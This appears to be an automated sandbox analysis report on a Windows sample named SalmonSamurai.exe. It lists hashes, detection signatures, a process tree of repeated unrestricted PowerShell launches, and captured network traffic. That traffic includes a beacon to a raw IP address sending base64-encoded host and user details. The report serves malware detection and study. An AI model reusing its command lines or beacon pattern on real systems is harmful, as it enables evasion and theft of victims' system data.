Windows Analysis Report
SalmonSamurai.exe

Overview

General Information

Sample name:SalmonSamurai.exe
Analysis ID:1579955
MD5:4ce4a1f912d0b9840a7f568454c6c45a
SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
Infos:

Detection

Score:45
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops large PE files
Loading BitLocker PowerShell Module
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SalmonSamurai.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\SalmonSamurai.exe" MD5: 4CE4A1F912D0B9840A7F568454C6C45A)
    • SalmonSamurai.exe (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7108 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2932 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5820 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SalmonSamurai.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • SalmonSamurai.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 5184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 6528 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 3584 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1640 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3176 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1104 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3588 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3904 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5268 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3300 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4192 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2920 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5296 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6184 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6284 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6592 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started Author: frack113 Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 1272, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 6672, ProcessName: powershell.exe
Source: Process started Author: _pete_0, TheDFIRReport Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3192, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 7108, ProcessName: chcp.com
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 1272, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 6672, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: SalmonSamurai.exe ReversingLabs: Detection: 30%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe EXE: powershell.exe

Compliance

Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe
Source: C:\Users\user\Desktop\SalmonSamurai.exe EXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe EXE: powershell.exe
Source: SalmonSamurai.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txt
Source: SalmonSamurai.exe Static PE information: certificate valid
Source: SalmonSamurai.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources
Source: Joe Sandbox View IP Address: 172.64.41.3 172.64.41.3
Source: unknown TCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV9NOE5DMVVfdHJ1ZV9EUFNfWElfV2luZG93cyAxMCBQcm9fMTIzIG1pbnV0ZXMgKDAuMDUgaG91cnMpX0M6XFVzZXJzXGpvbmVzXzA2MTU0NF9qb25lc19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xqb25lc1xBcHBEYXRhXExvY2FsXFRlbXBfSk9ORVMtUENfX0ludGVsNjQgRmFtaWx5IDYgTW9kZWwgMTQzIFN0ZXBwaW5nIDgsIEdlbnVpbmVJbnRlbF9BTUQ2NF9DOl8yX0M6XFVzZXJzXGpvbmVzXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1 Accept: application/json, text/plain, */* User-Agent: axios/0.27.2 Host: 89.187.28.253 Connection: close
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Dec 2024 16:06:02 GMT Content-Type: text/html Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://l.twimg.com/i/hpkp_report0
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.icohttp://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.icohttp://arianna.libero.it/search/ab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/suggest?v=3&query=
Source: SalmonSamurai.exe, 00000000.00000000.1783637639.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://radce.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://report-example.test/test
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
